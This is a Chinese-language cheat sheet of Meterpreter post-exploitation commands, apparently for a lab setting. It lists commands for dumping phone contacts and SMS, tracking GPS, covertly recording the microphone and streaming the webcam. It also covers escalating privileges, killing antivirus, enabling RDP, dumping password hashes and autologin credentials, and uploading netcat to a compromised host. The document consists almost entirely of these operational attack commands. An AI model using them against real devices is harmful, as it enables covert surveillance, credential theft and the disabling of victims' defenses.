获取手机通讯录： dump_contacts

获取短信记录：dump_sms

控制实验手机发短信：send_sms -d 15907167886 -t "hello"

获取实验手机GPS定位信息：geolocate

控制实验手机录音：record_mic -d 5

获取实验手机相机设备：webcam_list

控制实验手机拍照：webcam_snap

直播实验手机摄像头：webcam_stream

查看进程：ps

查看当前进程号：getpid

查看系统信息：sysinfo

查看目标机是否为虚拟机：run post/windows/gather/checkvm

查看完整网络设置：route

查看当前权限：getuid

自动提权：getsystem

关闭杀毒软件：run post/windows/manage/killav

启动远程桌面协议：run post/windows/manage/enable_rdp

列举当前登录的用户：run post/windows/gather/enum_logged_on_users

查看当前应用程序：run post/windows/gather/enum_applications

抓取目标机的屏幕截图：load espia ； screengrab

获取相机设备：webcam_list

控制拍照 ：webcam_snap

直播摄像头：webcam_stream

控制录音：record_mic

查看当前处于目标机的那个目录：pwd

查看当前目录：getlwd

导出当前用户密码哈希：run hashdump

也可以使用下面这个命令导出 权限更高 run windows/gather/smart_hashdump

抓取自动登录的用户名和密码 run windows/gather/credentials/windows_autologin

查看文件内容，文件必须存在：cat c:\boot.ini

删除指定的文件：del c:\boot.ini

上传文件到目标主机：upload /root/Desktop/netcat.exe c:\

下载文件到本机：download nimeia.txt /root/Desktop/

编辑文件：edit c:\boot.ini

打印本地目录：getlwd

打印目标目录：getwd

更改本地目录：lcd

打印本地目录：lpwd

输出目标目录：pwd

进入目标文件下：cd c:\

模块跟后门模块一致

跟后门端口一致